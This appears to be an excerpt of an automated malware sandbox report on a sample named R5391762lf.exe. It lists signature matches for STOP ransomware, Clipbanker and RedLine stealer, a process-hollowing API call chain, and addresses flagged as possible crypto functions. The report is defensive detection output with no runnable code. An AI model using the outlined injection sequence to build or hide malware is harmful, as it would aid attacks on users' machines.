Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.1405143882.0000000004456000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000002.1620821652.000000000088C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1373934785.0000000004498000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.1502845330.0000000001D0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.1548118097.0000000004466000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.1411013560.0000000004578000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001B.00000002.2060772952.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000017.00000002.1792336779.00000000044D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.1703479175.0000000000B3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.3283516956.0000000000AC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001E.00000002.2677244146.0000000000880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	0_2_05EA0110
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	5_2_05DB0110
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	6_2_05EC0110

Detected potential crypto function

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_00405653	0_2_00405653
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA3520	0_2_05EA3520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7520	0_2_05EA7520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECD7F1	0_2_05ECD7F1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA79A	0_2_05EAA79A
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAC760	0_2_05EAC760
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAE6E0	0_2_05EAE6E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EEB69F	0_2_05EEB69F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA699	0_2_05EAA699
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECD1A4	0_2_05ECD1A4
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EEE141	0_2_05EEE141
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA9120	0_2_05EA9120
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA70E0	0_2_05EA70E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA30F0	0_2_05EA30F0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EB00D0	0_2_05EB00D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAB0B0	0_2_05EAB0B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA026	0_2_05EAA026
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EBF030	0_2_05EBF030
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAB000	0_2_05EAB000
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7393	0_2_05EA7393
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EEE37C	0_2_05EEE37C
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05F222C0	0_2_05F222C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7220	0_2_05EA7220
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA5DE7	0_2_05EA5DE7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA5DF7	0_2_05EA5DF7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EE2D1E	0_2_05EE2D1E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ED4E9F	0_2_05ED4E9F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA8E60	0_2_05EA8E60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA59F7	0_2_05EA59F7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA89D0	0_2_05EA89D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECE9A3	0_2_05ECE9A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECF9B0	0_2_05ECF9B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EBA930	0_2_05EBA930
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA916	0_2_05EAA916
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EC18D0	0_2_05EC18D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7880	0_2_05EA7880
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EADBE0	0_2_05EADBE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA2B60	0_2_05EA2B60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EB0B00	0_2_05EB0B00
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7A80	0_2_05EA7A80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EACA10	0_2_05EACA10
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040D240	2_2_0040D240
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00419F90	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040C070	2_2_0040C070
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042E003	2_2_0042E003
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00408030	2_2_00408030
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410160	2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004C8113	2_2_004C8113
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004021C0	2_2_004021C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044237E	2_2_0044237E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004084C0	2_2_004084C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004344FF	2_2_004344FF
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0043E5A3	2_2_0043E5A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040A660	2_2_0040A660
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0041E690	2_2_0041E690
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406740	2_2_00406740
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00402750	2_2_00402750
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040A710	2_2_0040A710
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00408780	2_2_00408780
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042C804	2_2_0042C804
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406880	2_2_00406880
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004349F3	2_2_004349F3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004069F3	2_2_004069F3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00402B80	2_2_00402B80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406B80	2_2_00406B80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044ACFF	2_2_0044ACFF
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042CE51	2_2_0042CE51
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00434E0B	2_2_00434E0B
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406EE0	2_2_00406EE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00420F30	2_2_00420F30
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00405057	2_2_00405057
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042F010	2_2_0042F010
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004070E0	2_2_004070E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004391F6	2_2_004391F6
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00435240	2_2_00435240
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004C9343	2_2_004C9343
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00405447	2_2_00405447
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00405457	2_2_00405457
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00449506	2_2_00449506
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044B5B1	2_2_0044B5B1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00435675	2_2_00435675
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409686	2_2_00409686
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040F730	2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044D7A1	2_2_0044D7A1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00481920	2_2_00481920
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044D9DC	2_2_0044D9DC
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00449A71	2_2_00449A71
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00443B40	2_2_00443B40
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409CF9	2_2_00409CF9
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040DD40	2_2_0040DD40
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00427D6C	2_2_00427D6C
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040BDC0	2_2_0040BDC0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409DFA	2_2_00409DFA
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409F76	2_2_00409F76
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0046BFE0	2_2_0046BFE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00449FE3	2_2_00449FE3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB3520	5_2_05DB3520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7520	5_2_05DB7520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDD7F1	5_2_05DDD7F1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA79A	5_2_05DBA79A
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBC760	5_2_05DBC760
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBE6E0	5_2_05DBE6E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DFB69F	5_2_05DFB69F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA699	5_2_05DBA699
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDD1A4	5_2_05DDD1A4
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DFE141	5_2_05DFE141
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB9120	5_2_05DB9120
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DC00D0	5_2_05DC00D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB30F0	5_2_05DB30F0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB70E0	5_2_05DB70E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBB0B0	5_2_05DBB0B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBB000	5_2_05DBB000
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DCF030	5_2_05DCF030
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA026	5_2_05DBA026
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7393	5_2_05DB7393
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DFE37C	5_2_05DFE37C
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05E322C0	5_2_05E322C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7220	5_2_05DB7220
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB5DF7	5_2_05DB5DF7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB5DE7	5_2_05DB5DE7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DF2D1E	5_2_05DF2D1E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DE4E9F	5_2_05DE4E9F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB8E60	5_2_05DB8E60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB89D0	5_2_05DB89D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB59F7	5_2_05DB59F7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDF9B0	5_2_05DDF9B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDE9A3	5_2_05DDE9A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA916	5_2_05DBA916
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DCA930	5_2_05DCA930
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DD18D0	5_2_05DD18D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7880	5_2_05DB7880
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBDBE0	5_2_05DBDBE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB2B60	5_2_05DB2B60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DC0B00	5_2_05DC0B00
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7A80	5_2_05DB7A80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBCA10	5_2_05DBCA10
